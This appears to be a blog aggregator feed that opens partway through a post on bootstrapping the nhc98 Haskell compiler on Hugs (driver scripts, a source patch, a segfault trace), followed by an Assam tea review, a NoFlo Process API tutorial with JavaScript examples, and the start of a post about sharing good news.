The result is a bunch of GreenCard source files without these pesky CPP pre-processor directives. Hugs can pre-process sources on the fly, but this makes evaluation orders of magnitude slower. Pre-processing the sources once before using them repeatedly seems like a better choice.

There is still a minor problem with GreenCard on Hugs. The GreenCard sources import the module NonStdTrace, which depends on built-in prelude functions from nhc98. Obviously, they are not available when running on Hugs (it has its own prelude implementation), so we need to provide an alternative using just the regular Hugs prelude. The following snippet creates a file named src/prelude/NonStd/NonStdTraceBootstrap.hs with the necessary changes.

cd ${NHCDIR}/src/prelude/NonStd/
sed -e 's|NonStdTrace|NonStdTraceBootstrap|' \
    -e 's|import PreludeBuiltin||' \
    -e 's|_||g' NonStdTrace.hs > NonStdTraceBootstrap.hs

Then we change a single line in src/greencard/NHCBackend.hs to make it import NonStdTraceBootstrap instead of NonStdTrace.

cd ${NHCDIR}/src/greencard
sed -i -e 's|NonStdTrace|NonStdTraceBootstrap|' NHCBackend.hs

To run GreenCard we still need a driver script. Let’s call this hugs-greencard and place it in ${NHCDIR}:

#!/bin/bash

HUGSDIR="$(dirname $(readlink -f $(which runhugs)))/../"
SEARCH_HUGS=$(printf "${NHCDIR}/src/%s/*:" compiler prelude libraries)

runhugs -98 \
        -P${HUGSDIR}/lib/hugs/packages/*:${NHCDIR}/include/*:${SEARCH_HUGS} \
        ${NHCDIR}/src/greencard/GreenCard.lhs \
        $@

Make it executable:

cd ${NHCDIR}
chmod +x hugs-greencard

Building the prelude!

Where were we? Ah, the prelude. As stated earlier, we need a working replacement for nhc98comp, which will be called by the driver script script/nhc98 (created by the configure script). Let’s call the replacement hugs-nhc, and again we’ll dump it in ${NHCDIR}. Here it is in all its glory:

#!/bin/bash

# Root directory of Hugs installation
HUGSDIR="$(dirname $(readlink -f $(which runhugs)))/../"

# TODO: "libraries" alone may be sufficient
SEARCH_HUGS=$(printf "${NHCDIR}/src/%s/*:" compiler prelude libraries)

# Filter everything from "+RTS" to "-RTS" from $@ because MainNhc98.hs
# does not know what to do with these flags.
ARGS=""
SKIP="false"
for arg in "$@"; do
    if [[ $arg == "+RTS" ]]; then
        SKIP="true"
    elif [[ $arg == "-RTS" ]]; then
        SKIP="false"
    elif [[ $SKIP == "false" ]]; then
        ARGS="${ARGS} $arg"
    fi
done

runhugs -98 \
        -P${HUGSDIR}/lib/hugs/packages/*:${SEARCH_HUGS} \
        ${NHCDIR}/src/compiler98/MainNhc98.hs \
        $ARGS

All this does is run Hugs (runhugs) with language extensions (-98), ensures that Hugs knows where to look for Hugs and nhc98 modules (-P), loads up the compiler’s main function, and then passes any arguments other than RTS flags ($ARGS) to it.

Let’s also make this executable:

cd ${NHCDIR}
chmod +x hugs-nhc

The compiler sources contain pre-processor directives, which need to be removed before running hugs-nhc. It would be foolish to let Hugs pre-process the sources at runtime with -F. In my tests it made hugs-nhc run slower by an order of magnitude. Let’s pre-process the sources of the compiler and the libraries it depends on with hugs-cpphs (see above):

cd ${NHCDIR}
CPPPRE="${NHCDIR}/hugs-cpphs -D__HUGS__"

FILES="src/compiler98/GcodeLowC.hs \
 src/libraries/filepath/System/FilePath.hs \
 src/libraries/filepath/System/FilePath/Posix.hs"

for file in $FILES; do
    cp $file $file.original && $CPPPRE $file.original > $file && rm $file.original
done

The compiler’s driver script script/nhc98 expects to find the executables of hmake-PRAGMA, greencard-nhc98, and cpphs in the architecture-specific lib directory (in my case that’s ${NHCDIR}/lib/x86_64-Linux/). They do not exist, obviously, but for two of them we already have scripts to run them on top of Hugs. hmake-PRAGMA does not seem to be very important; replacing it with cat appears to be fine. To pacify the compiler script it’s easiest to just replace a few definitions:

cd ${NHCDIR}
sed -i \
  -e '0,/^GREENCARD=.*$/s||GREENCARD="$NHC98BINDIR/../hugs-greencard"|' \
  -e '0,/^CPPHS=.*$/s||CPPHS="$NHC98BINDIR/../hugs-cpphs -D__NHC__"|' \
  -e '0,/^PRAGMA=.*$/s||PRAGMA=cat|' \
  script/nhc98

Initially, this looked like it would be enough, but half-way through building the prelude Hugs choked when interpreting nhc98 to build a certain module. After some experimentation it turned out that the NHC.FFI module in src/prelude/FFI/CTypes.hs is too big for Hugs. Running nhc98 on that module causes Hugs to abort with an overflow in the control stack. The fix here is to break up the module to make it easier for nhc98 to build it, which in turn prevents Hugs from doing too much work at once.

Apply this patch:

From 9eb2a2066eb9f93e60e447aab28479af6c8b9759 Mon Sep 17 00:00:00 2001
From: Ricardo Wurmus <rekado@elephly.net>
Date: Sat, 7 Jan 2017 22:31:41 +0100
Subject: [PATCH] Split up CTypes

This is necessary to avoid a control stack overflow in Hugs when
building the FFI library with nhc98 running on Hugs.
---
 src/prelude/FFI/CStrings.hs     |  2 ++
 src/prelude/FFI/CTypes.hs       | 14 --------------
 src/prelude/FFI/CTypes1.hs      | 20 ++++++++++++++++++++
 src/prelude/FFI/CTypes2.hs      | 22 ++++++++++++++++++++++
 src/prelude/FFI/CTypesExtra.hs  |  2 ++
 src/prelude/FFI/FFI.hs          |  2 ++
 src/prelude/FFI/Makefile        |  8 ++++----
 src/prelude/FFI/MarshalAlloc.hs |  2 ++
 src/prelude/FFI/MarshalUtils.hs |  2 ++
 9 files changed, 56 insertions(+), 18 deletions(-)
 create mode 100644 src/prelude/FFI/CTypes1.hs
 create mode 100644 src/prelude/FFI/CTypes2.hs

diff --git a/src/prelude/FFI/CStrings.hs b/src/prelude/FFI/CStrings.hs
index 18fdfa9..f1373cf 100644
--- a/src/prelude/FFI/CStrings.hs
+++ b/src/prelude/FFI/CStrings.hs
@@ -23,6 +23,8 @@ module NHC.FFI (
 
 import MarshalArray
 import CTypes
+import CTypes1
+import CTypes2
 import Ptr
 import Word
 import Char
diff --git a/src/prelude/FFI/CTypes.hs b/src/prelude/FFI/CTypes.hs
index 18e9d60..942e7a1 100644
--- a/src/prelude/FFI/CTypes.hs
+++ b/src/prelude/FFI/CTypes.hs
@@ -4,11 +4,6 @@ module NHC.FFI
 	  -- Typeable, Storable, Bounded, Real, Integral, Bits
 	  CChar(..),    CSChar(..),  CUChar(..)
 	, CShort(..),   CUShort(..), CInt(..),    CUInt(..)
-	, CLong(..),    CULong(..),  CLLong(..),  CULLong(..)
-
-	  -- Floating types, instances of: Eq, Ord, Num, Read, Show, Enum,
-	  -- Typeable, Storable, Real, Fractional, Floating, RealFrac, RealFloat
-	, CFloat(..),   CDouble(..), CLDouble(..)
 	) where
 
 import NonStdUnsafeCoerce
@@ -29,12 +24,3 @@ INTEGRAL_TYPE(CShort,Int16)
 INTEGRAL_TYPE(CUShort,Word16)
 INTEGRAL_TYPE(CInt,Int)
 INTEGRAL_TYPE(CUInt,Word32)
-INTEGRAL_TYPE(CLong,Int32)
-INTEGRAL_TYPE(CULong,Word32)
-INTEGRAL_TYPE(CLLong,Int64)
-INTEGRAL_TYPE(CULLong,Word64)
-
-FLOATING_TYPE(CFloat,Float)
-FLOATING_TYPE(CDouble,Double)
--- HACK: Currently no long double in the FFI, so we simply re-use double
-FLOATING_TYPE(CLDouble,Double)
diff --git a/src/prelude/FFI/CTypes1.hs b/src/prelude/FFI/CTypes1.hs
new file mode 100644
index 0000000..81ba0f5
--- /dev/null
+++ b/src/prelude/FFI/CTypes1.hs
@@ -0,0 +1,20 @@
+{-# OPTIONS_COMPILE -cpp #-}
+module NHC.FFI
+	( CLong(..),    CULong(..),  CLLong(..),  CULLong(..)
+	) where
+
+import NonStdUnsafeCoerce
+import Int	( Int8,  Int16,  Int32,  Int64  )
+import Word	( Word8, Word16, Word32, Word64 )
+import Storable	( Storable(..) )
+-- import Data.Bits( Bits(..) )
+-- import NHC.SizedTypes
+import Monad	( liftM )
+import Ptr	( castPtr )
+
+#include "CTypes.h"
+
+INTEGRAL_TYPE(CLong,Int32)
+INTEGRAL_TYPE(CULong,Word32)
+INTEGRAL_TYPE(CLLong,Int64)
+INTEGRAL_TYPE(CULLong,Word64)
diff --git a/src/prelude/FFI/CTypes2.hs b/src/prelude/FFI/CTypes2.hs
new file mode 100644
index 0000000..7d66242
--- /dev/null
+++ b/src/prelude/FFI/CTypes2.hs
@@ -0,0 +1,22 @@
+{-# OPTIONS_COMPILE -cpp #-}
+module NHC.FFI
+	( -- Floating types, instances of: Eq, Ord, Num, Read, Show, Enum,
+	  -- Typeable, Storable, Real, Fractional, Floating, RealFrac, RealFloat
+	CFloat(..), CDouble(..), CLDouble(..)
+	) where
+
+import NonStdUnsafeCoerce
+import Int	( Int8,  Int16,  Int32,  Int64  )
+import Word	( Word8, Word16, Word32, Word64 )
+import Storable	( Storable(..) )
+-- import Data.Bits( Bits(..) )
+-- import NHC.SizedTypes
+import Monad	( liftM )
+import Ptr	( castPtr )
+
+#include "CTypes.h"
+
+FLOATING_TYPE(CFloat,Float)
+FLOATING_TYPE(CDouble,Double)
+-- HACK: Currently no long double in the FFI, so we simply re-use double
+FLOATING_TYPE(CLDouble,Double)
diff --git a/src/prelude/FFI/CTypesExtra.hs b/src/prelude/FFI/CTypesExtra.hs
index ba3f15b..7cbdcbb 100644
--- a/src/prelude/FFI/CTypesExtra.hs
+++ b/src/prelude/FFI/CTypesExtra.hs
@@ -20,6 +20,8 @@ import Storable	( Storable(..) )
 import Monad	( liftM )
 import Ptr	( castPtr )
 import CTypes
+import CTypes1
+import CTypes2
 
 #include "CTypes.h"
 
diff --git a/src/prelude/FFI/FFI.hs b/src/prelude/FFI/FFI.hs
index 9d91e57..0c29394 100644
--- a/src/prelude/FFI/FFI.hs
+++ b/src/prelude/FFI/FFI.hs
@@ -217,6 +217,8 @@ import MarshalUtils	-- routines for basic marshalling
 import MarshalError	-- routines for basic error-handling
 
 import CTypes		-- newtypes for various C basic types
+import CTypes1
+import CTypes2
 import CTypesExtra	-- types for various extra C types
 import CStrings		-- C pointer to array of char
 import CString		-- nhc98-only
diff --git a/src/prelude/FFI/Makefile b/src/prelude/FFI/Makefile
index 99065f8..e229672 100644
--- a/src/prelude/FFI/Makefile
+++ b/src/prelude/FFI/Makefile
@@ -18,7 +18,7 @@ EXTRA_C_FLAGS	=
 SRCS = \
 	Addr.hs Ptr.hs FunPtr.hs Storable.hs \
 	ForeignObj.hs ForeignPtr.hs Int.hs Word.hs \
-	CError.hs CTypes.hs CTypesExtra.hs CStrings.hs \
+	CError.hs CTypes.hs CTypes1.hs CTypes2.hs CTypesExtra.hs CStrings.hs \
 	MarshalAlloc.hs MarshalArray.hs MarshalError.hs MarshalUtils.hs \
 	StablePtr.hs
 
@@ -38,12 +38,12 @@ Word.hs: Word.hs.cpp
 # dependencies generated by hmake -Md: (and hacked by MW)
 ${OBJDIR}/MarshalError.$O: ${OBJDIR}/Ptr.$O 
 ${OBJDIR}/MarshalUtils.$O: ${OBJDIR}/Ptr.$O ${OBJDIR}/Storable.$O \
-	${OBJDIR}/MarshalAlloc.$O ${OBJDIR}/CTypes.$O ${OBJDIR}/CTypesExtra.$O 
+	${OBJDIR}/MarshalAlloc.$O ${OBJDIR}/CTypes.$O ${OBJDIR}/CTypes1.$O ${OBJDIR}/CTypes2.$O ${OBJDIR}/CTypesExtra.$O
 ${OBJDIR}/MarshalArray.$O: ${OBJDIR}/Ptr.$O ${OBJDIR}/Storable.$O \
 	${OBJDIR}/MarshalAlloc.$O ${OBJDIR}/MarshalUtils.$O 
-${OBJDIR}/CTypesExtra.$O: ${OBJDIR}/Int.$O ${OBJDIR}/Word.$O ${OBJDIR}/CTypes.$O
+${OBJDIR}/CTypesExtra.$O: ${OBJDIR}/Int.$O ${OBJDIR}/Word.$O ${OBJDIR}/CTypes.$O ${OBJDIR}/CTypes1.$O ${OBJDIR}/CTypes2.$O
 ${OBJDIR}/CTypes.$O: ${OBJDIR}/Int.$O ${OBJDIR}/Word.$O ${OBJDIR}/Storable.$O \
-	${OBJDIR}/Ptr.$O 
+	${OBJDIR}/Ptr.$O ${OBJDIR}/CTypes1.$O ${OBJDIR}/CTypes2.$O
 ${OBJDIR}/CStrings.$O: ${OBJDIR}/MarshalArray.$O ${OBJDIR}/CTypes.$O \
 	${OBJDIR}/Ptr.$O ${OBJDIR}/Word.$O
 ${OBJDIR}/MarshalAlloc.$O: ${OBJDIR}/Ptr.$O ${OBJDIR}/Storable.$O \
diff --git a/src/prelude/FFI/MarshalAlloc.hs b/src/prelude/FFI/MarshalAlloc.hs
index 34ac7b3..5b43554 100644
--- a/src/prelude/FFI/MarshalAlloc.hs
+++ b/src/prelude/FFI/MarshalAlloc.hs
@@ -14,6 +14,8 @@ import ForeignPtr (FinalizerPtr(..))
 import Storable
 import CError
 import CTypes
+import CTypes1
+import CTypes2
 import CTypesExtra (CSize)
 import NHC.DErrNo
 
diff --git a/src/prelude/FFI/MarshalUtils.hs b/src/prelude/FFI/MarshalUtils.hs
index 312719b..bd9d149 100644
--- a/src/prelude/FFI/MarshalUtils.hs
+++ b/src/prelude/FFI/MarshalUtils.hs
@@ -29,6 +29,8 @@ import Ptr
 import Storable
 import MarshalAlloc
 import CTypes
+import CTypes1
+import CTypes2
 import CTypesExtra
 
 -- combined allocation and marshalling
-- 
2.11.0

After all this it’s time for a break. Run the following commands for a long break:

cd ${NHCDIR}/src/prelude
time make NHC98COMP=$NHCDIR/hugs-nhc

After the break—it took more than two hours on my laptop—you should see output like this:

ranlib /path/to/nhc98-1.22/lib/x86_64-Linux/Prelude.a

Congratulations! You now have a native nhc98 prelude library!

Building hmake

The compiler and additional Haskell libraries all require a tool called “hmake” to automatically order dependencies, so we’ll try to build it next. There’s just a small problem with one of the source files: src/hmake/FileName.hs contains the name “Niklas Röjemo” and the compiler really does not like the umlaut. With apologies to Niklas we change the copyright line to appease the compiler.

cd $NHCDIR/src/hmake
mv FileName.hs{,.broken}
tr '\366' 'o' < FileName.hs.broken > FileName.hs
rm FileName.hs.broken
NHC98COMP=$NHCDIR/hugs-nhc make HC=$NHCDIR/script/nhc98

To be continued

Unfortunately, the hmake tools are not working. All of the tools (e.g. MkConfig) fail with an early segmentation fault. There must be an error in the runtime, likely in src/runtime/Kernel/mutator.c where bytecode for heap and stack operations is interpreted. One thing that looks like a problem is statements like this:

*--sp = (NodePtr) constptr[-HEAPOFFSET(ip[0])];

constptr is NULL, so this seems to be just pointer arithmetic expressed in array notation. These errors can be fixed by rewriting the statement to use explicit pointer arithmetic:

*--sp = (NodePtr) (constptr + (-HEAPOFFSET(ip[0])));

Unfortunately, this doesn’t seem to be enough as there is another segfault in the handling of the EvalTOS label. IND_REMOVE is applied to the contents of the stack pointer, which turns out to be 0x10, which just doesn’t seem right. IND_REMOVE removes indirection by following pointer addresses until the value stored at the given address does not look like an address. This fails because 0x10 does look like an address—it’s just invalid. I have enabled a bunch of tracing and debugging features, but I don’t fully understand how the nhc98 runtime is supposed to work.
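To make that description concrete, here is a toy Python sketch of the indirection-chasing idea (it has nothing to do with the real C macro; the heap dictionary, the addresses and the looks_like_address predicate are all made up for illustration):

# Toy model of "follow pointers until the stored value no longer looks
# like an address"; not the real IND_REMOVE from the nhc98 runtime.
def ind_remove(heap, addr, looks_like_address):
    value = heap[addr]   # in the real runtime, an invalid address segfaults here
    while looks_like_address(value):
        addr = value
        value = heap[addr]
    return addr

# One level of indirection gets removed...
heap = {0x1000: 0x1008, 0x1008: "node payload"}
is_address = lambda v: isinstance(v, int)
assert ind_remove(heap, 0x1000, is_address) == 0x1008
# ...but chasing a value that merely *looks* like an address, such as 0x10,
# raises a KeyError -- the toy equivalent of the segfault in the trace below.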

Judging from mails on the nhc-bugs and nhc-users lists I see that I’m not the only one experiencing segfaults. This email suggests that segfaults are “associated with changes in the way gcc lays out static arrays of bytecodes, e.g. by putting extra padding space between arrays that are supposed to be adjacent.” I may have to try different compiler flags or an older version of GCC; I only tried with GCC 4.9.4 but the Debian package for nhc98 used version 2.95 or 3.3.

For completeness' sake, here's the trace of the failing execution of MkProg:

(gdb) run
Starting program: /path/to/nhc98-1.22/lib/x86_64-Linux/MkProg 
ZAP_ARG_I1		hp=0x80c5010 sp=0x8136a10 fp=0x8136a10 ip=0x8085140
NEEDHEAP_I32	hp=0x80c5010 sp=0x8136a10 fp=0x8136a10 ip=0x8085141
HEAP_CVAL_N1	hp=0x80c5010 sp=0x8136a10 fp=0x8136a10 ip=0x8085142
HEAP_CVAL_I3	hp=0x80c5014 sp=0x8136a10 fp=0x8136a10 ip=0x8085144
HEAP_OFF_N1		hp=0x80c5018 sp=0x8136a10 fp=0x8136a10 ip=0x8085145
PUSH_HEAP		hp=0x80c501c sp=0x8136a10 fp=0x8136a10 ip=0x8085147
HEAP_CVAL_I4	hp=0x80c501c sp=0x8136a0c fp=0x8136a10 ip=0x8085148
HEAP_CVAL_I5	hp=0x80c5020 sp=0x8136a0c fp=0x8136a10 ip=0x8085149
HEAP_OFF_N1		hp=0x80c5024 sp=0x8136a0c fp=0x8136a10 ip=0x808514a
PUSH_CVAL_P1	hp=0x80c5028 sp=0x8136a0c fp=0x8136a10 ip=0x808514c
PUSH_I1		    hp=0x80c5028 sp=0x8136a08 fp=0x8136a10 ip=0x808514e
ZAP_STACK_P1	hp=0x80c5028 sp=0x8136a04 fp=0x8136a10 ip=0x808514f
EVAL		    hp=0x80c5028 sp=0x8136a04 fp=0x8136a10 ip=0x8085151
eval: evalToS

Program received signal SIGSEGV, Segmentation fault.
0x0804ac27 in run (toplevel=0x80c5008) at mutator.c:425
425		IND_REMOVE(nodeptr);

ip is the instruction pointer, which points at the current element in the bytecode stream. fp is probably the frame pointer, sp the stack pointer, and hp the heap pointer. The implementation notes for nhc98 will probably be helpful in solving this problem.

Anyway, that’s where I’m at so far. If you are interested in these kinds of problems or other bootstrapping projects, consider joining the efforts of the Bootstrappable Builds project!

Footnotes:

1
It is unclear when exactly the release was made, but any time between 1991 and 1993 seems likely.

Thursday, 05 January 2017

Review of 10 Vahdam’s Assam teas

Hook’s Humble Homepage | 14:15, Thursday, 05 January 2017

I had the pleasure of sampling 10 Assam teas from Vahdam (a very well chosen birthday gift from my fiancée).

First, a little bit about the company. It is Indian and, according to its website, deals directly with the plantations and tea growers for fairer trade and better quality (plantation to shop in 24-72 hours).

Once the teas were ordered, they arrived in a timely manner and were very carefully packed (even the cardboard box was hand-stitched into a cloth), and included two complimentary Darjeeling samples. I did have some issues with their (new) web shop, but found their support very helpful and quick.

All teas were from 2016 (I received them in late 2016 as well), AFAICR all were from the summer pickings / second flush.

The single-estates had the exact date of picking on them as well as the number of the invoice they were bought under, while the blends had the month of blending/packaging.

Now back to the important part – the teas. All ten I found to be of superior quality, and I was delighted to sample the surprisingly wide array of tastes the Assam region produces.

I was able to get two steeps (pearly boil, 4 minutes) out of all of them and found most of them perfectly enjoyable without either milk or sugar. Still, for most I prefer adding both as I like the rounded mellowness that (full) milk and (light brown or rock) sugar bring to Assam teas.

Here are my thoughts on them. If I had to pick out my favourites, it would be the Enigma and the Royal Breakfast, but all of the single-estates brought something else to the table, so it is very likely they will be constantly rotating in my tea cupboard.

Single-estate

Assam Enigma Second Flush Black Tea

A brilliantly complex Assam

Among all the Assams I have ever tasted, this is one of the most interesting ones.

Initially you are greeted by the sweet smell of cinnamon of the dry leaves, which surprisingly disappears as soon as the leaves submerge in hot water.

With milk and just a small teaspoon of sugar, the tea produces a surprisingly complex aroma for an Assam – the predominant taste is of quality flower/berry honey with a hint of caramel, followed by an almost fruity and woody finish.

As most of the ten Vahdam’s Assams I have had the pleasure of sampling, it is perfectly fine without milk and sugar, but I do enjoy it more with just a dash of both :)

…truly an enigma, yet a sweet one!

Bokel Assam Second Flush Black Tea

Very pleasant aroma, reminiscent of cocoa

I made the “mistake” of reading the description before sipping it and cannot but agree that vanilla and cocoa notes permeate the taste.

As I am used to strong tea, I would be willing to take this even in the evenings. With a good book and some chocolate confectionery, this should be a great match!

Gingia Premium Assam Second Flush Black Tea

Light-footed and reminiscent of pu-erh

It is a rare occasion that I enjoy an Assam more without milk than with it, but Gingia Premium is one of them.

What this tea reminds me of most is the basic taste of a pu-erh (but without its typical complex misty aroma). The first sip also brought cold-brew coffee to mind, but that association soon gave way to the pu-erh.

Nahorhabi Classic Assam Second Flush Black Tea

Great, somewhat fruity daily driver

I find it very enjoyable and surprisingly fruity for an Assam. I usually drink Assam with a bit of milk and one teaspoon of brown sugar, but as another reviewer noted, this tea is not too bitter and goes fine without either as well.

I could get used to using this as my daily cuppa. Most likely I will come back to this Nahorhabi again.

Halmari Clonal Premium Assam Second Flush Black Tea

Very malty, but not my favourite

The Halmari Clonal Premium has a very round and malty body.

Whether with or without milk, you can also feel the chocolatey notes. But without milk (and sugar) its sweetness becomes a lot more apparent.

In the second steep, the maltiness comes to the foreground even more. Without milk it might even come across a bit like a (Korean) barley tea.

In a way I really like it, but personally I associate such maltiness too much with non-caffeinated drinks such as barley coffee, barley tea, Ovomaltine and Horlicks to truly enjoy it. As such, I will probably not be buying it often, but if malty is what you are after – this is a really good choice.

Blends

Assam Exotic Second Flush Black Tea

A good representative of its kind

I found this Assam to be predominantly malty, but paired up with foresty notes. Quite an enjoyable brew and what I would expect of a quality Assam.

Daily Assam Black Tea

Good daily driver

It is not super-strong either in taste or caffeine, but it does have a malty full body. At the very end it turns almost a bit watery, but not in a (too) displeasing way – depending on what you are after it might be either a positive or negative characteristic of this tea.

Great all-rounder and a daily driver, but if you are looking for something special, for the same money you can get nicer picks of Assam in this shop.

Personally I would pick almost any other Vahdam’s Assam over this one (apart from the Organic Breakfast), but solely because most of the time I am looking for something special in an Assam.

But if you are looking for a daily driver, this is a very fine choice.

Breakfast teas

Royal Breakfast Black Tea

One of my favourite breakfast teas

This is so far one of my favourite breakfast teas.

It is just robust enough, while displaying a nice earthy, woody flavour with a hint of chocolate. Quite enjoyable!

I usually enjoy mine with milk and sugar, but this one goes very well also without it (I will still usually drink it with both though).

Classic English Breakfast Black Tea

A slightly classier spin on a classic breakfast tea

This spin of the classic breakfast tea is a bit less robust than usual, as this pure Assam version simply is not tart in taste. As such it is enjoyable even without milk or sugar.

Personally I prefer my breakfast teas to be even stronger, to pick me up in the morning, but this one just about meets that condition. I can very much see it as a daily driver.

Organic Breakfast Black Tea

For me personally, too weak

It is not a bad tea at all, but personally I found it too watery for a breakfast tea.

That being said, I do like my breakfast tea to pack a punch, so do take my review with that in mind.

Also whoever reads this review, do take into account that I rated only for taste and feel. I did not assign any extra points for it being organic, as I do not think bio/eco/organic things should be of lesser quality than the stuff not carrying such certification.

hook out → sipping my last batch of Vahdam’s second flush Enigma and wondering how much of it to order


P.S. A copy of this review is on /r/tea subreddit and the discussion is there.

Process API for NoFlo components

Henri Bergius | 00:00, Thursday, 05 January 2017

It has been a while since I've written about flow-based programming, but now that I'm putting most of my time into Flowhub, things are moving really quickly.

One example is the new component API in NoFlo that has been emerging over the last year or so.

Most of the work described here was done by Vladimir Sibirov from The Grid team.

Introducing the Process API

NoFlo programs consist of graphs where different nodes are connected together. These nodes can themselves be graphs, or they can be components written in JavaScript.

A NoFlo component is simply a JavaScript module that provides a certain interface that allows NoFlo to run it. In the early days there was little convention on how to write components, but over time some conventions emerged, and with them helpers to build well-behaved components more easily.

Now with the upcoming NoFlo 0.8 release we’ve taken the best ideas from those helpers and rolled them back into the noflo.Component base class.

So, what does a component written using the Process API look like?

// Load the NoFlo interface
var noflo = require('noflo');
// Also load any other dependencies you have
var fs = require('fs');

// Implement the getComponent function that NoFlo's component loader
// uses to instantiate components to the program
exports.getComponent = function () {
  // Start by instantiating a component
  var c = new noflo.Component();

  // Provide some metadata, including icon for visual editors
  c.description = 'Reads a file from the filesystem';
  c.icon = 'file';

  // Declare the ports you want your component to have, including
  // their data types
  c.inPorts.add('in', {
    datatype: 'string'
  });
  c.outPorts.add('out', {
    datatype: 'string'
  });
  c.outPorts.add('error', {
    datatype: 'object'
  });

  // Implement the processing function that gets called when the
  // inport buffers have packets available
  c.process(function (input, output) {
    // Precondition: check that the "in" port has a data packet.
    // Not necessary for single-inport components but added here
    // for the sake of demonstration
    if (!input.hasData('in')) {
      return;
    }

    // Since the preconditions matched, we can read from the inport
    // buffer and start processing
    var filePath = input.getData('in');
    fs.readFile(filePath, 'utf-8', function (err, contents) {
      // In case of errors we can just pass the error to the "error"
      // outport
      if (err) {
        output.done(err);
        return;
      }

      // Send the file contents to the "out" port
      output.send({
        out: contents
      });
      // Tell NoFlo we've finished processing
      output.done();
    });
  });

  // Finally return the component to the loader
  return c;
}

Most of this is still the same component API we’ve had for quite a while: instantiation, component metadata, port declarations. What is new is the process function and that is what we’ll focus on.

When is process called?

NoFlo components call their processing function whenever they’ve received packets to any of their regular inports.

In general any new information packets received by the component cause the process function to trigger. However, there are some exceptions:

  • Non-triggering ports don’t cause the function to be called
  • Ports that have been set to forward brackets don’t cause the function to be called on bracket IPs, only on data

Handling preconditions

When the processing function is called, the first job is to determine if the component has received enough data to act. These “firing rules” can be used for checking things like:

  • When having multiple inports, do all of them contain data packets?
  • If multiple input packets are to be processed together, are all of them available?
  • If receiving a stream of packets, is the complete stream available?
  • Any input synchronization needs in general

The NoFlo component input handler provides methods for checking the contents of the input buffer. Each of these returns a boolean indicating whether the conditions are matched:

  • input.has('portname') whether an input buffer contains packets of any type
  • input.hasData('portname') whether an input buffer contains data packets
  • input.hasStream('portname') whether an input buffer contains at least one complete stream of packets

For convenience, has and hasData can be used to check multiple ports at the same time. For example:

// Fail precondition check unless both inports have a data packet
if (!input.hasData('in1', 'in2')) return;

For more complex checking it is also possible to pass a validation function to the has method. This function will get called for each information packet in the port(s) buffer:

// We want to process only when color is green
var validator = function (packet) {
  if (packet.data.color === 'green') {
    return true;
  }
  return false;
}
// Run all packets in in1 and in2 through the validator to
// check that our firing conditions are met
if (!input.has('in1', 'in2', validator)) return;

The firing rules should be checked at the beginning of the processing function, before we start actually reading packets from the buffer. If they are not met, you can simply finish the run with a return.

Processing packets

Once your preconditions have been met, it is time to read packets from the buffers and start doing work with them.

For reading packets there are equivalent get functions to the has functions used above:

  • input.get('portname') read the first packet from the port’s buffer
  • input.getData('portname') read the first data packet, discarding preceding bracket IPs if any
  • input.getStream('portname') read a whole stream of packets from the port’s buffer

For get and getStream you receive whole IP objects. For convenience, getData returns just the data payload of the data packet.

When you have read the packets you want to work with, the next step is to do whatever your component is supposed to do. Do some simple data processing, call some remote API function, or whatever. NoFlo doesn’t really care whether this is done synchronously or asynchronously.

Note: once you read packets from an inport, the component activates. After this it is necessary to finish the run by calling output.done() once processing is complete.

Sending packets

While the component is active, it can send packets to any number of outports using the output.send method. This method accepts a map of port names and information packets.

output.send({
  out1: new noflo.IP('data', "some data"),
  out2: new noflo.IP('data', [1, 2, 3])
});

For data packets you can also just send the data as-is, and NoFlo will wrap it to an information packet.

Once you’ve finished processing, simply call output.done() to deactivate the component. There is also a convenience method that is a combination of send and done. This is useful for simple components:

c.process(function (input, output) {
  var data = input.getData('in');
  // We just add one to the number we received and send it out
  output.sendDone({
    out: data + 1
  });
});

In normal situations the packets are transmitted immediately. However, when working on individual packets that are part of a stream, NoFlo components keep an output buffer to ensure that packets from the stream are transmitted in their original order.

Component lifecycle

In addition to making input processing easier, the other big aspect of the Process API is to help formalize NoFlo’s component and program lifecycle.

NoFlo program lifecycle

The component lifecycle is quite similar to the program lifecycle shown above. There are three states:

  • Initialized: the component has been instantiated in a NoFlo graph
  • Activated: the component has read some data from inport buffers and is processing it
  • Deactivated: all processing has finished

Once all components in a NoFlo network have deactivated, the whole program is finished.

Components are only allowed to do work and send packets when they’re activated. They shouldn’t do any work before receiving input packets, and should not send anything after deactivating.

Generator components

Regular NoFlo components only send data associated with input packets they’ve received. One exception is generators, a class of components that can send packets whenever something happens.

Some examples of generators include:

  • Network servers that listen to requests
  • Components that wait for user input like mouse clicks or text entry
  • Timer loops

The same rules of “only send when activated” apply also to generators. However, they can utilize the processing context to self-activate as needed:

exports.getComponent = function () {
 var c = new noflo.Component();
 c.inPorts.add('start', { datatype: 'bang' });
 c.inPorts.add('stop', { datatype: 'bang' });
 c.outPorts.add('out', { datatype: 'bang' });
 // Generators generally want to send data immediately and
 // not buffer
 c.autoOrdering = false;

 // Helper function for clearing a running timer loop
 var cleanup = function () {
   // Clear the timer
   clearInterval(c.timer.interval);
   // Then deactivate the long-running context
   c.timer.deactivate();
   c.timer = null;
 }

 // Receive the context together with input and output
 c.process(function (input, output, context) {
   if (input.hasData('start')) {
     // We've received a packet to the "start" port
     // Stop the previous interval and deactivate it, if any
     if (c.timer) {
       cleanup();
     }
     // Activate the context by reading the packet
     input.getData('start');
     // Set the activated context to component so it can
     // be deactivated from the outside
     c.timer = context
     // Start generating packets
     c.timer.interval = setInterval(function () {
       // Send a packet
       output.send({
         out: true
       });
     }, 100);
     // Since we keep the generator running we don't
     // call done here
   }

   if (input.hasData('stop')) {
     // We've received a packet to the "stop" port
     input.getData('stop');
     if (!c.timer) {
       // No timers running, we can just finish here
       output.done();
       return;
     }
     // Stop the interval and deactivate
     cleanup();
     // Also call done for this one
     output.done();
   }
 });

 // We also may need to clear the timer at network shutdown
 c.shutdown = function () {
   if (c.timer) {
     // Stop the interval and deactivate
     cleanup();
   }
   c.emit('end');
   c.started = false;
 }
}

Time to prepare

NoFlo 0.7 included a preview version of the Process API. However, last week during the 33C3 conference we finished some tricky bits related to process lifecycle and automatic bracket forwarding that make it more useful for real-life NoFlo applications.

These improvements will land in NoFlo 0.8, due out soon.

So, if you’re maintaining a NoFlo application, now is a good time to give the git version a spin and look at porting your components to the new API. Make sure to report any issues you encounter!

We're currently migrating all the hundred-plus NoFlo open source modules to the latest build and testing process so that they can be easily updated to the new APIs when they land.

Friday, 30 December 2016

My goal for the new year: more Good News

Marcus's Blog | 11:01, Friday, 30 December 2016

I have worked on many Free Software and freedom-related projects in the past years. From that I have learned that we tend to write news about things that go wrong and need to be fixed. That's of course very important, but we also need to learn to communicate our successes better.

